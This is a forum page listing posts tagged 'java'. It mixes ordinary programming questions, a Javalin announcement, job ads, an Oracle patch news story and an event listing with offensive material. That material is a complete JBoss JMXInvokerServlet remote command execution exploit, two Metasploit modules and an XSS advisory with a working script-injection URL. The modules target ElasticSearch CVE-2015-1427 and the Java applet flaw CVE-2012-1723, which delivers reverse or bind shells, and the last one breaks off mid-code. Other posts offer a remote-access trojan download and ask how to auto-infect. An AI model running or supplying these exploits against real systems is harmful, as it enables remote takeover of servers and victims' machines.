
Showing results for tags 'java'.

Found 21 results

  1. Hello! I am a student at ASE and I need help completing a project in Java, for a fee. Thank you.
  2. Hello! I apologize for not having posted in a while. Recently I ran into a problem. For 2-3 months I have been trying to finish a project, but I still have not managed to. What I have left is the coding part, namely Tornado encoding and decoding, which has to be implemented in Java or MATLAB. Below is the theory part that I received: Course. An example or the code itself would be a great help. Thank you in advance.
  3. Introducing Javalin

     Javalin is a very lightweight web framework for Kotlin and Java, inspired by Sparkjava and koa.js. Javalin is written in Kotlin with a few functional interfaces written in Java. This was necessary to provide an enjoyable and near identical experience for both Kotlin and Java developers.

     Java quickstart

     Add dependency (maven)

         <dependency>
             <groupId>io.javalin</groupId>
             <artifactId>javalin</artifactId>
             <version>1.0.0</version>
         </dependency>

     Start programming

         import io.javalin.Javalin;

         public class HelloWorld {
             public static void main(String[] args) {
                 Javalin app = Javalin.start(7000);
                 app.get("/", ctx -> ctx.result("Hello World"));
             }
         }

     Kotlin quickstart

     Add dependency (gradle)

         compile 'io.javalin:javalin:1.0.0'

     Start programming

         import io.javalin.Javalin

         fun main(args: Array<String>) {
             val app = Javalin.start(7000)
             app.get("/") { ctx -> ctx.result("Hello World") }
         }

     Special thanks:
     - Blake Mizerany, for creating Sinatra
     - Per Wendel, for creating Spark
     - Christian Rasmussen, for being a great guy
     - Per Kristian Kummermo, also for being a great guy

     Download: javalin-master.zip or git clone https://github.com/tipsy/javalin.git

     Sources:
     - https://javalin.io/news/javalin-1.0.0-stable.html
     - https://github.com/tipsy/javalin
  4. Hello, maybe someone can clarify for me how the vulnerability in jquery version 1.11.2 can be exploited. I'm not very good at java and I can't figure it out. I kept reading all kinds of articles on Google but I don't really understand them. Or is there an application that checks automatically whether it is vulnerable or not?
  5. Hi, I have the following piece of Java code that I am not sure I understand perfectly, and to make it worse I need to write something with the same functionality in Python. "rs", "CEVA" and "ALTCEVA" are variables that come from further up in the script....

         Inflater inflater = new Inflater();
         byte[] result = new byte[rs.getInt("CEVA")];
         inflater.setInput(rs.getBytes("ALTCEVA"));
         int length = inflater.inflate(result);
         System.out.println(new String(result, 0, length, "UTF-8"));
         System.out.println();
         System.out.println("-----");
         System.out.println();
         inflater.end();

     Do you have any idea how I can write something with the same functionality in Python? Is there a library in Python that does what that Inflater does in Java? (I searched the net and saw the answers on stackoverflow, but I am probably too stupid to understand them.) Can someone help me with an example in Python of how I could do this? Thank you,
  6. Seeing the hundreds of torrent sites that are shutting down, I built a Java application that imitates the TBDEV platform, with the goal of replacing torrent websites. The main purpose was to learn Java, the application being good practice because it uses as many features as possible. The application is for PCs only and cannot be run in a browser. I created it this spring, but I abandoned it for lack of time. I would like to know whether it is worth continuing, whether it is worth making it open-source, and whether there are people on the forum who want to collaborate to finish and improve it. Before you come with mean comments, I want to point out that the application's design belongs to iPlay.ro, a Romanian torrent site that unfortunately no longer exists. I tried to contact the administrators of that site to ask for their permission to use their design, but I could not reach them. Below are a few screenshots of the application:

     All images:
     - https://s17.postimg.org/9cr92h9xr/Screen_Shot_2016_08_12_at_9_10_43_PM.png
     - https://s17.postimg.org/hwan08ia7/Screen_Shot_2016_08_12_at_9_10_49_PM.png
     - https://s17.postimg.org/aucpe1eof/Screen_Shot_2016_08_12_at_9_10_52_PM.png
     - https://s17.postimg.org/6mhx5ad8v/Screen_Shot_2016_08_12_at_9_11_00_PM.png
     - https://s17.postimg.org/cby5pljf3/Screen_Shot_2016_08_12_at_9_11_22_PM.png
     - https://s17.postimg.org/71t6yaz67/Screen_Shot_2016_08_12_at_9_11_27_PM.png
     - https://s17.postimg.org/4yirqmzdb/Screen_Shot_2016_08_12_at_9_11_35_PM.png
     - https://s17.postimg.org/fzii9egzz/Screen_Shot_2016_08_12_at_9_16_56_PM.png
     - https://s17.postimg.org/7vae4nukv/Screen_Shot_2016_08_12_at_9_17_06_PM.png
     - https://s17.postimg.org/9odaszfrj/Screen_Shot_2016_08_12_at_9_17_14_PM.png
     - https://s17.postimg.org/41gxvid8v/Screen_Shot_2016_08_12_at_9_17_27_PM.png
     - https://s17.postimg.org/9qx6ftjf3/Screen_Shot_2016_08_12_at_9_17_35_PM.png
     - https://s17.postimg.org/q5r3se1e7/Screen_Shot_2016_08_12_at_9_18_03_PM.png
  7. C# and Java programmers for Dell. Also Oracle DBA, dev (also for Dell). Send a PM for the contact email.
  8. jRAT v5 Java Remote Administration Download: DepositFiles
  9. Meaning, what do you need installed on my PC in order to use it (Java installed, perhaps?) I saw a tutorial on Google about how it works, but I did not find what you need in order to test it.
  10. Hello I want a way to make Auto Infect java Answer Thanks?
  11. Dear members, First of all, apologies if this is posted in the wrong section. We are urgently looking for highly professional web security analysts who wish to work by contract in our security company. You need to have a comprehensive knowledge in researching exploitation of web security (eg. php, java etc). If you wish to apply to this project, please provide us your CV. Also companies can apply if they have staff who can work with us locally. Regards, M.
  12. ######################################################################
      # Exploit Title: Java.com RXSS and DOM-XSS
      # Date: 01/04/2015
      # Author: Yann CAM @ Synetis - ASafety
      # Vendor or Software Link: java.com: Java + You
      # Version: /
      # Category: Reflected Cross Site Scripting and DOM based XSS
      # Google dork:
      # Tested on: Java.com main domain
      ######################################################################

      Java description :
      ======================================================================
      As of 2015, Java is one of the most popular programming languages in use, particularly for client-server web applications, with a reported 9 million developers. Java was originally developed by James Gosling at Sun Microsystems (which has since been acquired by Oracle Corporation) and released in 1995 as a core component of Sun Microsystems' Java platform. The language derives much of its syntax from C and C++, but it has fewer low-level facilities than either of them. Java.com is the main website to acquire Java JRE or JDK software.

      RXSS Vulnerability description - PoC n°1 :
      ======================================================================
      A reflected XSS is available in the java.com main domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Java portals, or capture Java's users credentials such cookies. It's also possible to forge a fake Java's page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "n" variable and is not properly sanitized before being used to his page. Tested on Firefox 32.0.

      PoC:
      https://www.java.com/fr/download/faq/index_general.xml?n=20">2</a><script>alert(/Yann CAM @asafety_www.synetis.com/);</script>?printFriendly=true

      Screenshots :
      ======================================================================
      - http://www.asafety.fr/data/20141025-java.com_DOMXSS-01.png
      - http://www.asafety.fr/data/20141025-java.com_DOMXSS-02.png
      - http://www.asafety.fr/data/20141025-java.com_DOMXSS-03.png
      - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-01.png
      - http://www.asafety.fr/data/20141025-java.com_Reflected_XSS-02.png

      Solution:
      ======================================================================
      Fixed by Oracle/Java Security Team.

      Additional resources :
      ======================================================================
      - http://www.java.com/
      - http://www.oracle.com/
      - http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
      - http://www.asafety.fr/actualites-news/contribution-java-com-dom-xss-reflected-xss
      - http://www.synetis.com

      Report timeline :
      ======================================================================
      2014-10-25 : Oracle/Java Team alerted with details and PoC.
      2014-10-27 : Oracle/Java response and confirm vulnerabilities.
      2014-12-23 : Vulnerabilities seems to be fixed.
      2015-04-01 : Public advisory

      Credits :
      ======================================================================
      www.synetis.com
      Consulting firm in management and information security

      Yann CAM - Security Consultant @ Synetis | ASafety

      --
      SYNETIS | ASafety
      CONTACT: www.synetis.com | www.asafety.fr

      Source: http://packetstorm.wowhacker.com/1504-exploits/javacom-xss.txt
  13. /*
       * JBoss JMXInvokerServlet Remote Command Execution
       * JMXInvoker.java v0.3 - Luca Carettoni @_ikki
       *
       * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
       * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
       * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
       * and the "JMX Console" are protected or disabled.
       *
       * [FAQ]
       *
       * Q: Is my target vulnerable?
       * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
       *
       * Q: How to fix it?
       * A: Enable authentication in "jmx-invoker-service.xml"
       *
       * Q: Is this exploit version-dependent?
       * A: Unfortunately, yes. An hash value is used to properly invoke a method.
       *    At least comparing version 4.x and 5.x, these hashes are different.
       *
       * Q: How to compile and launch it?
       * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
       *    java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
       *    Yes, it's a Java exploit. I can already see some of you complaining....
       */

      import java.io.BufferedReader;
      import java.io.IOException;
      import java.io.InputStream;
      import java.io.InputStreamReader;
      import java.io.ObjectOutputStream;
      import java.lang.reflect.Array;
      import java.lang.reflect.Field;
      import java.lang.reflect.Method;
      import java.net.ConnectException;
      import java.net.HttpURLConnection;
      import java.net.URL;
      import javax.management.MalformedObjectNameException;
      import javax.management.ObjectName;
      import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

      public class JMXInvokerServlet {

          //---------> CHANGE ME <---------
          static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1
          static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
          static final String cmd = "touch /tmp/exectest";
          //-------------------------------

          public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

              System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

              //Create a malicious Java serialized object
              MarshalledInvocation payload = new MarshalledInvocation();
              payload.setObjectName(new Integer(hash));

              //Executes the MBean invoke operation
              Class<?> c = Class.forName("javax.management.MBeanServerConnection");
              Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
              payload.setMethod(method);

              //Define MBean's name, operation and pars
              Object myObj[] = new Object[4];
              //MBean object name
              myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
              //Operation name
              myObj[1] = new String("createScriptDeployment");
              //Actual parameters
              myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
              //Operation signature
              myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

              payload.setArguments(myObj);
              System.out.println("\n--[*] MarshalledInvocation object created");
              //For debugging - visualize the raw object
              //System.out.println(dump(payload));

              //Serialize the object
              try {
                  //Send the payload
                  URL server = new URL(url);
                  HttpURLConnection conn = (HttpURLConnection) server.openConnection();
                  conn.setRequestMethod("POST");
                  conn.setDoOutput(true);
                  conn.setDoInput(true);
                  conn.setUseCaches(false);
                  conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
                  conn.setRequestProperty("Connection", "keep-alive");
                  conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
                  conn.setRequestProperty("Content-Type", "application/octet-stream");
                  conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
                  conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

                  ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
                  wr.writeObject(payload);
                  System.out.println("\n--[*] MarshalledInvocation object serialized");
                  System.out.println("\n--[*] Sending payload...");
                  wr.flush();
                  wr.close();

                  //Get the response
                  InputStream is = conn.getInputStream();
                  BufferedReader rd = new BufferedReader(new InputStreamReader(is));
                  String line;
                  StringBuffer response = new StringBuffer();
                  while ((line = rd.readLine()) != null) {
                      response.append(line);
                  }
                  rd.close();

                  if (response.indexOf("Script Name") != -1) {
                      System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
                  } else {
                      System.out.println("\n--[!] An invocation error occured...");
                  }
              } catch (ConnectException cex) {
                  System.out.println("\n--[!] A connection error occured...");
              } catch (IOException ex) {
                  ex.printStackTrace();
              }
          }

          /*
           * Raw dump of generic Java Objects
           */
          static String dump(Object o) {
              StringBuffer buffer = new StringBuffer();
              Class oClass = o.getClass();

              if (oClass.isArray()) {
                  buffer.append("[");

                  for (int i = 0; i < Array.getLength(o); i++) {
                      if (i > 0) {
                          buffer.append(",\n");
                      }
                      Object value = Array.get(o, i);
                      buffer.append(value.getClass().isArray() ? dump(value) : value);
                  }
                  buffer.append("]");
              } else {
                  buffer.append("{");
                  while (oClass != null) {
                      Field[] fields = oClass.getDeclaredFields();
                      for (int i = 0; i < fields.length; i++) {
                          if (buffer.length() > 1) {
                              buffer.append(",\n");
                          }
                          fields[i].setAccessible(true);
                          buffer.append(fields[i].getName());
                          buffer.append("=");
                          try {
                              Object value = fields[i].get(o);
                              if (value != null) {
                                  buffer.append(value.getClass().isArray() ? dump(value) : value);
                              }
                          } catch (IllegalAccessException e) {
                          }
                      }
                      oClass = oClass.getSuperclass();
                  }
                  buffer.append("}");
              }
              return buffer.toString();
          }
      }

      Source
  14. ##
      # This module requires Metasploit: http://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::FileDropper
        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',
            'Description' => %q{
              This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
              exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
              REST API, which does not require authentication, where the search function allows
              groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
              to reference arbitrary classes. It can be used to execute arbitrary Java code. This
              module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
            },
            'Author' =>
              [
                'Cameron Morris', # Vulnerability discovery
                'Darren Martyn', # Public Exploit
                'juan vazquez' # Metasploit module
              ],
            'License' => MSF_LICENSE,
            'References' =>
              [
                ['CVE', '2015-1427'],
                ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
                ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
                ['URL', 'http://drops.wooyun.org/papers/5107']
              ],
            'Platform' => 'java',
            'Arch' => ARCH_JAVA,
            'Targets' =>
              [
                ['ElasticSearch 1.4.2', {}]
              ],
            'DisclosureDate' => 'Feb 11 2015',
            'DefaultTarget' => 0))

          register_options(
            [
              Opt::RPORT(9200),
              OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
            ], self.class)
        end

        def check
          result = Exploit::CheckCode::Safe

          if vulnerable?
            result = Exploit::CheckCode::Vulnerable
          end

          result
        end

        def exploit
          print_status("#{peer} - Checking vulnerability...")
          unless vulnerable?
            fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
          end

          print_status("#{peer} - Discovering TEMP path...")
          res = execute(java_tmp_dir)
          tmp_dir = parse_result(res)
          if tmp_dir.nil?
            fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
          else
            print_good("#{peer} - TEMP path on '#{tmp_dir}'")
          end

          print_status("#{peer} - Discovering remote OS...")
          res = execute(java_os)
          os = parse_result(res)
          if os.nil?
            fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
          else
            print_good("#{peer} - Remote OS is '#{os}'")
          end

          if os =~ /win/i
            tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
          else
            tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
          end

          register_files_for_cleanup(tmp_file)

          print_status("#{peer} - Trying to load metasploit payload...")
          java = java_load_class(os, tmp_file)
          execute(java)
        end

        def vulnerable?
          java = 'java.lang.Math.class.forName("java.lang.Runtime")'

          vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
          res = execute(java)
          result = parse_result(res)

          if result.nil?
            vprint_status("#{peer} - no response to test")
            return false
          elsif result == 'class java.lang.Runtime'
            return true
          end

          false
        end

        def parse_result(res)
          unless res
            vprint_error("#{peer} - No response")
            return nil
          end

          unless res.code == 200 && res.body
            vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
            return nil
          end

          begin
            json = JSON.parse(res.body.to_s)
          rescue JSON::ParserError
            return nil
          end

          begin
            result = json['hits']['hits'][0]['fields']['msf_result']
          rescue
            return nil
          end

          result.is_a?(::Array) ? result.first : result
        end

        def java_tmp_dir
          'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
        end

        def java_os
          'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
        end

        def java_load_class(os, tmp_file)
          if os =~ /win/i
            tmp_file.gsub!(/\\/, '\\\\\\\\')
          end

          java = [
            'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
            'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
            "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
            'b64_i=b64.newInstance();',
            "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
            'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
            'file_class=java.lang.Math.class.forName("java.io.File");',
            "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
            'loader=loader_class.newInstance();',
            'loader.addURL(file_url);',
            'm=loader.loadClass(\'metasploit.Payload\');',
            'm.main(null);'
          ]

          java.join
        end

        def execute(java, timeout = 20)
          payload = {
            "size" => 1,
            "query" => {
              "filtered" => {
                "query" => {
                  "match_all" => {}
                }
              }
            },
            "script_fields" => {
              "msf_result" => {
                "script" => java
              }
            }
          }

          res = send_request_cgi({
            'uri' => normalize_uri(target_uri.path.to_s, "_search"),
            'method' => 'POST',
            'data' => JSON.generate(payload)
          }, timeout)

          res
        end
      end

      Source
  15. Features: BETA 1 is released! Requirements: Java 8 (for now) Do not click here.
  16. Oracle’s first Critical Patch Update of the year arrived Tuesday with its usual volume, and some disturbing fanfare. Oracle admins today are staring at 169 patches on their collective plates across the company’s product line. One of the more pressing fixes is for an issue in the Oracle E-Business Suite, a bundle of applications that includes CRM, financial, supply chain and project management software.

      Noted Oracle bug-hunter David Litchfield last June 11 alerted Oracle to a serious flaw that he said behaved like a backdoor, though he told Threatpost he did not believe it was an intentional backdoor such as one implanted by law enforcement or government.

      “Maybe, though, giving them the benefit [of the] doubt, it could be that some [developer] was testing something and they forgot to turn it off. Who knows? What is concerning however is that Oracle seem not to know who and why this privilege was granted, either,” Litchfield said via email.

      Litchfield released some details on the vulnerability, CVE-2015-0393, yesterday, explaining that the PUBLIC role in the database is granted INDEX privileges on the SYS table. This allows anyone to create an index in this particular table, Litchfield said.

      “By creating a function-based index an attacker can execute arbitrary SQL as the SYS user thus fully compromising the database server,” Litchfield said. “Anyone with a vulnerable eBusiness suite web server connected to the internet is potentially exposed to this as it is possible to chain multiple vulnerabilities to exploit this without a username and password.”

      Litchfield said there is no reason for PUBLIC to have INDEX privileges on the DUAL table, leading him to speculate that it’s either an intentional backdoor, or a result of poor coding.

      “My first thought was that this had possibly been left as a backdoor (because it can be trivially exploited to gain SYSDBA privileges) and was an indication that the database server had been compromised,” said Litchfield, who discovered the issue during a client engagement. “I communicated my fears to the client and they began an investigation to determine when the privilege had been granted and by who to ascertain the why. It turns out that no one had—this privilege is granted as part of a seeded install of Oracle eBusiness suite.”

      Litchfield confirmed that Oracle told him that its engineers looked at the bug and said there was “no indication of when or why the grants were originally added.” Oracle said in its CPU advisory that the vulnerability is not remotely exploitable and merited a criticality rating of 6.0 out of 10.

      “This has been addressed.” -Oracle spokesperson

      When asked for a comment, an Oracle representative sent Threatpost a link to the January Critical Patch Update and said: “This has been addressed,” referring to the Litchfield vulnerability.

      Oracle also announced that it was disabling the use of SSL 3.0, calling it an “obsolete protocol” that was only aggravated by the POODLE fallback vulnerability. Attacks against POODLE allow an attacker to take advantage of the fact that when a secure connection attempt fails, under some circumstances the Web server will fall back to an older protocol and try to renegotiate the secure connection. If the server supports SSLv3, an old protocol, and the attacker can force the failed connection attempt, the attacker can then execute a padding oracle attack against the server and eventually decrypt the contents of the secure connection.

      The company went a step further to recommend disabling SSL altogether in favor of TLS 1.2.

      “They should also expect that all versions of SSL be disabled in all Oracle software moving forward. A manual configuration change can allow Java SE clients and server endpoints, which have been updated with this Critical Patch Update, to continue to temporarily use SSL v3.0,” said Eric Maurice, Oracle software security assurance director. “However, Oracle strongly recommends organizations to phase out their use of SSL v3.0 as soon as possible.”

      As for Java, Oracle patched 19 vulnerabilities in the platform, 14 of those remotely exploitable, including a half-dozen rating either 9.3 or 10, the highest score on Oracle’s risk matrix. Four client-side vulnerabilities rated a 10, however, Oracle said the number of overall Java bugs continues to decline. In its last CPU, for example, Oracle patched 25 Java flaws, and last April it patched 37.

      “This relatively low historical number for Oracle Java SE fixes reflect the results of Oracle’s strategy for addressing security bugs affecting Java clients and improving security development practices in the Java development organization,” Maurice said.

      Oracle, meanwhile, patched eight vulnerabilities in its flagship Oracle Database Server, none of them remotely exploitable, and none applicable to client-only installations. The only other highly critical bugs, scoring 10.0, were found in Oracle Sun Systems Fujitsu M10-1, M10-4 and M10-4S servers.

      Source
  17. Hi, as I said in the previous topic, the one about delegation in Java (https://rstforums.com/forum/87471-delegation-java.rst), I am learning from the book Thinking in Java and I ran into a few problems with this. I have the following exercise to do from the book:

      Modify Detergent.java so that it uses delegation

      This is the Detergent.java class:

          class Cleanser {
              private String s = "Cleanser";
              public void append(String a) { s += a; }
              public void dilute() { append(" dilute()"); }
              public void apply() { append(" apply()"); }
              public void scrub() { append(" scrub()"); }
              public String toString() { return s; }
              public static void main(String[] args) {
                  Cleanser x = new Cleanser();
                  x.dilute(); x.apply(); x.scrub();
                  print(x);
              }
          }

          public class Detergent extends Cleanser {
              // Change a method:
              public void scrub() {
                  append(" Detergent.scrub()");
                  super.scrub(); // Call base-class version
              }
              // Add methods to the interface:
              public void foam() { append(" foam()"); }
              // Test the new class:
              public static void main(String[] args) {
                  Detergent x = new Detergent();
                  x.dilute();
                  x.apply();
                  x.scrub();
                  x.foam();
                  print(x);
                  print("Testing base class:");
                  Cleanser.main(args);
              }
          }

      and this is my solution:

          class Cleanser1 {
              private String s = "Cleanser";
              public void append(String a) { s += a; }
              public void dilute() { append("dilute()"); }
              public void apply() { append("apply()"); }
              public void scrub() { append("scrub()"); }
              public String toString() { return s; }
          }

          public class Detergent1 {
              Cleanser1 x = new Cleanser1();
              public void append(String s) { x.append(s); }
              public void dilute() { x.append("dilute"); }
              public void apply() { x.append("apply()"); }
              public void scrub() { x.append("Aply()"); }
              public void foam() { x.append("Foam()"); }
              public String toString() { return x.toString(); }
              public static void main(String args[]) {
                  Detergent x = new Detergent();
                  x.apply();
                  print(x);
              }
          }

      I searched the net for the solution to the exercise and found this: http://greggordon.org/java/tij4/reusing/DetergentDelegation.java I don't understand why the guy says that certain methods were fully delegated and others were not, and why he overrode the append method in the Detergent class, since in the book's example it inherited all the methods and rewrote only 2 of them, scrub and apply.

      Edit: I found the book's solutions guide, which is made by the author himself, and he solved this exercise exactly like me.

      PS: M2G told me to make this topic, "Java Questions", and to post here when I have problems, so that I don't make 100 topics for all the problems in the book.
  18. About: "Join the most important event dedicated to the Java community in Romania, organized by Oracle in collaboration with Bucharest Java User Group and Java partners. Discover how Java can increase your developer productivity so you can build the next generation of advanced applications that power the world. Java is the foundation for virtually every type of networked application and is the global standard for developing and delivering mobile applications, games, Web-based content, and enterprise software. With more than 9 million developers worldwide, Java enables you to efficiently develop and deploy exciting applications and services. With comprehensive tooling, a mature ecosystem, and robust performance, Java delivers applications portability across even the most disparate computing environments. The Java EE platform offers enterprise developers the opportunity to deliver today’s Web applications with the greatest efficiency, flexibility, and ease of development. After 13 years offering business critical applications for thousands of companies, Java EE remains ahead of the pack as an enterprise application and deployment platform. As the industry standard for enterprise computing, Java EE enables developers to take advantage of the emerging usages, patterns, frameworks, and technologies of the enterprise space. Developing enterprise applications has never been easier. Register online now for this FREE event."

      Agenda:

      Part 1 (15:00 - 18:30)
      - 15:00 - 15:30 Registration & Welcome coffee
      - 15:30 - 16:15 Keynote: Java Enterprise Edition - State of the Union; Speaker: David Delabassee, Java Principal Product Manager, Oracle
      - 16:15 - 16:45 Romanian Java User Groups Community Perspective BJUG after 1+ years; Speaker: Ioan Eugen Stan, Co-Founder, Bucharest Java User Group (BJUG)
      - 16:45 - 17:00 Coffee Break
      - 17:00 - 17:30 Web controlled Raspberry Pi Car using Java; Speaker: Bogdan Craciun, Software Architect SIVECO Romania
      - 17:30 - 18:00 Large scale enterprise application development with the Java EE technology stack; Speaker: Marius Harpau, Java Architect Endava
      - 18:00 - 18:30 “Weblogic 12c - What's new?” “Productivity in the Cloud with Oracle Application Development Framework (ADF)
      - 18:30 - 19:00 Social Break - Refreshments

      Part 2 (19:00 - 21:00) Monthly Bucharest JUG Event Edition #15 - JUG București - Pagina Principală
      - 19:00 - 20:00 Java EE 7 overview; Speaker: David Delabassee, Java Principal Product Manager, Oracle
      - 20:00 - 21:00 The Future starts with a Promise; Speaker: Alexandru Nedelcu, Software Engineer / Tech Lead at Epigrams

      Date and time: Aug 29, 2013 03:00 PM - 09:00 PM; Location: AFI Cotroceni – Cinema City BD. Vasile Milea 4 Bucharest Romania

      -- In case you did not read everything, the event is "Free"; you can register here.
  19. This Metasploit module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

          ##
          # This file is part of the Metasploit Framework and may be subject to
          # redistribution and commercial restrictions. Please see the Metasploit
          # Framework web site for more information on licensing and terms of use.
          # http://metasploit.com/framework/
          ##

          require 'msf/core'

          class Metasploit3 < Msf::Exploit::Remote
            Rank = ExcellentRanking

            include Msf::Exploit::Remote::HttpServer::HTML
            include Msf::Exploit::EXE

            include Msf::Exploit::Remote::BrowserAutopwn
            autopwn_info({ :javascript => false })

            def initialize( info = {} )
              super( update_info( info,
                'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution',
                'Description' => %q{
                    This module exploits a vulnerability in HotSpot bytecode verifier where an invalid
                  optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent
                  type checks. This allows a way to escape the JRE sandbox, and load additional classes
                  in order to perform malicious operations.
                },
                'License' => MSF_LICENSE,
                'Author' =>
                  [
                    'Stefan Cornellius', # Discoverer
                    'mihi', # Vuln analysis
                    'littlelightlittlefire', # metasploit module
                    'juan vazquez', # merged code (overlapped)
                    'sinn3r' # merged code (overlapped)
                  ],
                'References' =>
                  [
                    ['CVE', '2012-1723'],
                    ['OSVDB', '82877'],
                    ['BID', '52161'],
                    ['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'],
                    ['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'],
                    ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'],
                    ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'],
                    ['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b']
                  ],
                'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
                'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
                'Targets' =>
                  [
                    [ 'Generic (Java Payload)',
                      {
                        'Platform' => ['java'],
                        'Arch' => ARCH_JAVA
                      }
                    ],
                    [ 'Windows x86 (Native Payload)',
                      {
                        'Platform' => 'win',
                        'Arch' => ARCH_X86
                      }
                    ],
                    [ 'Mac OS X PPC (Native Payload)',
                      {
                        'Platform' => 'osx',
                        'Arch' => ARCH_PPC
                      }
                    ],
                    [ 'Mac OS X x86 (Native Payload)',
                      {
                        'Platform' => 'osx',
                        'Arch' => ARCH_X86
                      }
                    ],
                    [ 'Linux x86 (Native Payload)',
                      {
                        'Platform' => 'linux',
                        'Arch' => ARCH_X86
                      }
                    ],
                  ],
                'DefaultTarget' => 0,
                'DisclosureDate' => 'Jun 06 2012'
              ))
            end

            def exploit
              # load the static jar file
              path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1723.jar" )
              fd = File.open( path, "rb" )
              @jar_data = fd.read(fd.stat.size)
              fd.close

              super
            end

            def on_request_uri( cli, request )
              data = ""
              host = ""
              port = ""

              if not request.uri.match(/\.jar$/i)
                if not request.uri.match(/\/$/)
                  send_redirect( cli, get_resource() + '/', '')
                  return
                end

                print_status("Sending #{self.name}")

                payload = regenerate_payload( cli )
                if not payload
                  print_error("Failed to generate the payload." )
                  return
                end

                if target.name == 'Generic (Java Payload)'
                  if datastore['LHOST']
                    jar = payload.encoded
                    host = datastore['LHOST']
                    port = datastore['LPORT']
                    vprint_status("Sending java reverse shell")
                  else
                    port = datastore['LPORT']
                    datastore['RHOST'] = cli.peerhost
                    vprint_status( "Java bind shell" )
                  end
                  if jar
                    print_status( "Generated jar to drop (#{jar.length} bytes)." )
                    jar = Rex::Text.to_hex( jar, prefix="" )
                  else
                    print_error("Failed to generate the executable." )
                    return
                  end
                else

                  # NOTE: The EXE mixin automagically handles detection of arch/platform
                  data = generate_payload_exe

                  if data
                    print_status("Generated executable to drop (#{data.length} bytes)." )
                    data = Rex::Text.to_hex( data, prefix="" )
                  else
                    print_error("Failed to generate the executable." )
                    return
                  end

                end

                send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
                return
              end

              print_status("Sending jar")
              send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )

              handler( cli )
            end

            def generate_html( data, jar, host, port )
              jar_name = rand_text_alpha(rand(6)+3) + ".jar"

              html = "<html><head></head>"
              html += "<body>"
              html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">"
              html += "<param name=\"data\" value=\"#{data}\"/>" if data
